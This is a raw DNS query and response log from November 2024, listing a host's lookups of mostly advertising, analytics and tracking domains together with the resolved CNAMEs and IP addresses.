                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.994450092 CET192.168.2.171.1.1.10x7f17Standard query (0)connect.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:14.994575024 CET192.168.2.171.1.1.10xb03fStandard query (0)connect.facebook.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.013305902 CET192.168.2.171.1.1.10xfbf8Standard query (0)secure.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.013439894 CET192.168.2.171.1.1.10x9aeaStandard query (0)secure.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.390630007 CET192.168.2.171.1.1.10x94ccStandard query (0)pixel-config.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.390773058 CET192.168.2.171.1.1.10x4f41Standard query (0)pixel-config.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724603891 CET192.168.2.171.1.1.10xa4a1Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.724821091 CET192.168.2.171.1.1.10x2c2dStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.726790905 CET192.168.2.171.1.1.10x3b37Standard query (0)alb.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.726854086 CET192.168.2.171.1.1.10xb488Standard query (0)alb.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.765047073 CET192.168.2.171.1.1.10x6cd9Standard query (0)t.contentsquare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.765228033 CET192.168.2.171.1.1.10x929Standard query (0)t.contentsquare.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.870628119 CET192.168.2.171.1.1.10x3aStandard query (0)rules.quantcount.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.870764971 CET192.168.2.171.1.1.10x7a68Standard query (0)rules.quantcount.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.955984116 CET192.168.2.171.1.1.10x9eb3Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:15.956198931 CET192.168.2.171.1.1.10x4d19Standard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.102703094 CET192.168.2.171.1.1.10x8016Standard query (0)obseu.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.102703094 CET192.168.2.171.1.1.10x8eceStandard query (0)obseu.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.177546978 CET192.168.2.171.1.1.10xab3fStandard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.177546978 CET192.168.2.171.1.1.10x346eStandard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.699918985 CET192.168.2.171.1.1.10xd37eStandard query (0)www.linkedin.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.700042963 CET192.168.2.171.1.1.10xdb66Standard query (0)www.linkedin.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.908674002 CET192.168.2.171.1.1.10xbb0dStandard query (0)w3-reporting-nel.reddit.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:16.908837080 CET192.168.2.171.1.1.10x3decStandard query (0)w3-reporting-nel.reddit.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.109719992 CET192.168.2.171.1.1.10x6c37Standard query (0)api.segment.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.110619068 CET192.168.2.171.1.1.10x8bf7Standard query (0)api.segment.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.181214094 CET192.168.2.171.1.1.10xf3fdStandard query (0)294-tkb-300.mktoresp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.181355953 CET192.168.2.171.1.1.10x73b2Standard query (0)294-tkb-300.mktoresp.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183393955 CET192.168.2.171.1.1.10x4b74Standard query (0)www.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.183530092 CET192.168.2.171.1.1.10x8a64Standard query (0)www.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.434492111 CET192.168.2.171.1.1.10x3395Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.434657097 CET192.168.2.171.1.1.10x850aStandard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.438810110 CET192.168.2.171.1.1.10x4e87Standard query (0)rules.quantcount.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439095974 CET192.168.2.171.1.1.10x8131Standard query (0)rules.quantcount.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439547062 CET192.168.2.171.1.1.10xd74cStandard query (0)t.contentsquare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.439698935 CET192.168.2.171.1.1.10xaea0Standard query (0)t.contentsquare.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.688951969 CET192.168.2.171.1.1.10x2d92Standard query (0)googleads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.689356089 CET192.168.2.171.1.1.10x9a9bStandard query (0)googleads.g.doubleclick.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.720202923 CET192.168.2.171.1.1.10x1573Standard query (0)pixel.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:17.720642090 CET192.168.2.171.1.1.10xd69aStandard query (0)pixel.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.016087055 CET192.168.2.171.1.1.10x33b5Standard query (0)c.contentsquare.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.016087055 CET192.168.2.171.1.1.10xb52bStandard query (0)c.contentsquare.net65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.251940966 CET192.168.2.171.1.1.10xadf4Standard query (0)api.segment.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.251940966 CET192.168.2.171.1.1.10xde10Standard query (0)api.segment.io65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538569927 CET192.168.2.171.1.1.10x4c97Standard query (0)www.facebook.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.538805962 CET192.168.2.171.1.1.10x6f94Standard query (0)www.facebook.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.586992025 CET192.168.2.171.1.1.10xa9f6Standard query (0)s.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:18.587153912 CET192.168.2.171.1.1.10x9dacStandard query (0)s.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.147665024 CET192.168.2.171.1.1.10x3c59Standard query (0)pixel.quantserve.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:19.147826910 CET192.168.2.171.1.1.10xdb40Standard query (0)pixel.quantserve.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.000610113 CET192.168.2.171.1.1.10x8262Standard query (0)heapanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:20.000766039 CET192.168.2.171.1.1.10xc99fStandard query (0)heapanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.725660086 CET192.168.2.171.1.1.10x3826Standard query (0)heapanalytics.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:21.725779057 CET192.168.2.171.1.1.10x7654Standard query (0)heapanalytics.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.993839979 CET192.168.2.171.1.1.10x52dStandard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:23.994791031 CET192.168.2.171.1.1.10x4079Standard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.113799095 CET192.168.2.171.1.1.10xbc98Standard query (0)c.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.113954067 CET192.168.2.171.1.1.10x4dc9Standard query (0)c.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:28.367132902 CET192.168.2.171.1.1.10x884cStandard query (0)www.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:45.726120949 CET192.168.2.171.1.1.10xbfb8Standard query (0)www.facebook.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.226182938 CET192.168.2.171.1.1.10x4e90Standard query (0)www.google.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:01.226361990 CET192.168.2.171.1.1.10x6a3cStandard query (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.220377922 CET192.168.2.171.1.1.10x49b6Standard query (0)obseu.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:16.220571041 CET192.168.2.171.1.1.10x67b7Standard query (0)obseu.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.602591038 CET192.168.2.171.1.1.10xdbc6Standard query (0)obseu.powerrobotflower.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:17.602849960 CET192.168.2.171.1.1.10x5aa5Standard query (0)obseu.powerrobotflower.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.826196909 CET192.168.2.171.1.1.10x3454Standard query (0)b.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:19.826328993 CET192.168.2.171.1.1.10xb037Standard query (0)b.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.011850119 CET192.168.2.171.1.1.10x727dStandard query (0)b.6sc.coA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:21.011987925 CET192.168.2.171.1.1.10xebeeStandard query (0)b.6sc.co65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.012783051 CET192.168.2.171.1.1.10x3510Standard query (0)s.clarity.msA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:30:26.012980938 CET192.168.2.171.1.1.10x8b53Standard query (0)s.clarity.ms65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:55.211319923 CET1.1.1.1192.168.2.170x1b98No error (0)windowsupdatebg.s.llnwi.net87.248.205.0A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:56.441170931 CET1.1.1.1192.168.2.170x9e0bNo error (0)r.neurotags.net34.168.114.70A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:28:57.943727016 CET1.1.1.1192.168.2.170x8449No error (0)sepedatua.com103.134.152.12A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.172250032 CET1.1.1.1192.168.2.170xd82bNo error (0)www.google.com142.250.186.100A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:01.172672987 CET1.1.1.1192.168.2.170x2d77No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:04.803235054 CET1.1.1.1192.168.2.170xf5f0No error (0)mazans.com162.241.85.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:07.660872936 CET1.1.1.1192.168.2.170x1afdNo error (0)templatesmetadata.office.nettemplatesmetadata.office.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.327822924 CET1.1.1.1192.168.2.170x90b3No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.329046011 CET1.1.1.1192.168.2.170xbb76No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.344575882 CET1.1.1.1192.168.2.170xf5a8No error (0)cdn.segment.comd296je7bbdd650.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.344575882 CET1.1.1.1192.168.2.170xf5a8No error (0)d296je7bbdd650.cloudfront.net99.86.8.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345207930 CET1.1.1.1192.168.2.170x860eNo error (0)cdn.segment.comd296je7bbdd650.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.345735073 CET1.1.1.1192.168.2.170xb0b8No error (0)rum.hlx.pagen.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:08.346007109 CET1.1.1.1192.168.2.170xfa79No error (0)rum.hlx.pagen.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.115230083 CET1.1.1.1192.168.2.170xcc24No error (0)rum.hlx.pagen.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.116213083 CET1.1.1.1192.168.2.170x2bc8No error (0)rum.hlx.pagen.sni.global.fastly.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.817853928 CET1.1.1.1192.168.2.170x9005No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.818165064 CET1.1.1.1192.168.2.170xf089No error (0)assets.adobedtm.comcn-assets.adobedtm.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.867661953 CET1.1.1.1192.168.2.170x3d1fNo error (0)twilio.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.867661953 CET1.1.1.1192.168.2.170x3d1fNo error (0)adobetarget.data.adobedc.net66.235.152.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.867661953 CET1.1.1.1192.168.2.170x3d1fNo error (0)adobetarget.data.adobedc.net66.235.152.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.867661953 CET1.1.1.1192.168.2.170x3d1fNo error (0)adobetarget.data.adobedc.net66.235.152.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.868531942 CET1.1.1.1192.168.2.170xa237No error (0)j.6sc.coj2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.869106054 CET1.1.1.1192.168.2.170x2318No error (0)j.6sc.coj2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:09.876272917 CET1.1.1.1192.168.2.170xcca1No error (0)twilio.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.114598036 CET1.1.1.1192.168.2.170x1494No error (0)cdn.segment.comd296je7bbdd650.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.114598036 CET1.1.1.1192.168.2.170x1494No error (0)d296je7bbdd650.cloudfront.net99.86.8.175A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:10.115823984 CET1.1.1.1192.168.2.170xae6cNo error (0)cdn.segment.comd296je7bbdd650.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.023482084 CET1.1.1.1192.168.2.170xdbb3No error (0)j.6sc.coj2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.023825884 CET1.1.1.1192.168.2.170x201aNo error (0)j.6sc.coj2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.026118040 CET1.1.1.1192.168.2.170xeac4No error (0)twilio.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.026118040 CET1.1.1.1192.168.2.170xeac4No error (0)adobetarget.data.adobedc.net66.235.152.221A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.026118040 CET1.1.1.1192.168.2.170xeac4No error (0)adobetarget.data.adobedc.net66.235.152.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.026118040 CET1.1.1.1192.168.2.170xeac4No error (0)adobetarget.data.adobedc.net66.235.152.225A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.035794973 CET1.1.1.1192.168.2.170x37b9No error (0)twilio.tt.omtrdc.netadobetarget.data.adobedc.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.207684040 CET1.1.1.1192.168.2.170xe2f3No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.207703114 CET1.1.1.1192.168.2.170x162No error (0)www.google.com142.250.186.164A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.282862902 CET1.1.1.1192.168.2.170xd975No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.282989979 CET1.1.1.1192.168.2.170xe42cNo error (0)munchkin.marketo.netwildcard.marketo.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.283004045 CET1.1.1.1192.168.2.170xe5e9No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.283605099 CET1.1.1.1192.168.2.170x7d96No error (0)munchkin.marketo.netwildcard.marketo.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.298357964 CET1.1.1.1192.168.2.170xe9dNo error (0)consent.trustarc.com13.225.78.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.298357964 CET1.1.1.1192.168.2.170xe9dNo error (0)consent.trustarc.com13.225.78.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.298357964 CET1.1.1.1192.168.2.170xe9dNo error (0)consent.trustarc.com13.225.78.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.298357964 CET1.1.1.1192.168.2.170xe9dNo error (0)consent.trustarc.com13.225.78.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.305058002 CET1.1.1.1192.168.2.170x7b94No error (0)euob.powerrobotflower.com143.204.98.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.305058002 CET1.1.1.1192.168.2.170x7b94No error (0)euob.powerrobotflower.com143.204.98.33A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.305058002 CET1.1.1.1192.168.2.170x7b94No error (0)euob.powerrobotflower.com143.204.98.44A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:11.305058002 CET1.1.1.1192.168.2.170x7b94No error (0)euob.powerrobotflower.com143.204.98.128A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.364085913 CET1.1.1.1192.168.2.170x2e70No error (0)www.google.com65IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.364130020 CET1.1.1.1192.168.2.170xd985No error (0)www.google.com172.217.18.4A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)secure.adnxs.comxandr-g-geo.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.212A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.244A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.82A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.153A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.141A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.46A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.211.84A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.210.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.369765997 CET1.1.1.1192.168.2.170xbb5eNo error (0)ib.anycast.adnxs.com185.89.211.116A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.372370958 CET1.1.1.1192.168.2.170x8a7dNo error (0)c.6sc.coc2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.372606039 CET1.1.1.1192.168.2.170x1278No error (0)ipv6.6sc.coipv6-2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.372636080 CET1.1.1.1192.168.2.170x576aNo error (0)c.6sc.coc2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.377017975 CET1.1.1.1192.168.2.170x7240No error (0)ipv6.6sc.coipv6-2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.394629955 CET1.1.1.1192.168.2.170xdb49No error (0)munchkin.marketo.netwildcard.marketo.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.395371914 CET1.1.1.1192.168.2.170x733No error (0)munchkin.marketo.netwildcard.marketo.net.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.579041004 CET1.1.1.1192.168.2.170xabd5No error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.580323935 CET1.1.1.1192.168.2.170xf337No error (0)b.6sc.cob2.6sc.co.edgekey.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.594527960 CET1.1.1.1192.168.2.170x2763No error (0)consent.trustarc.com13.225.78.53A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.594527960 CET1.1.1.1192.168.2.170x2763No error (0)consent.trustarc.com13.225.78.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.594527960 CET1.1.1.1192.168.2.170x2763No error (0)consent.trustarc.com13.225.78.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.594527960 CET1.1.1.1192.168.2.170x2763No error (0)consent.trustarc.com13.225.78.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                                                                                                                          Nov 13, 2024 17:29:12.650583982 CET1.1.1.1192.168.2.170x24e0No error (0)snap.licdn.comod.linkedin.edgesuite.netCNAME (Canonical name)IN (0x0001)false
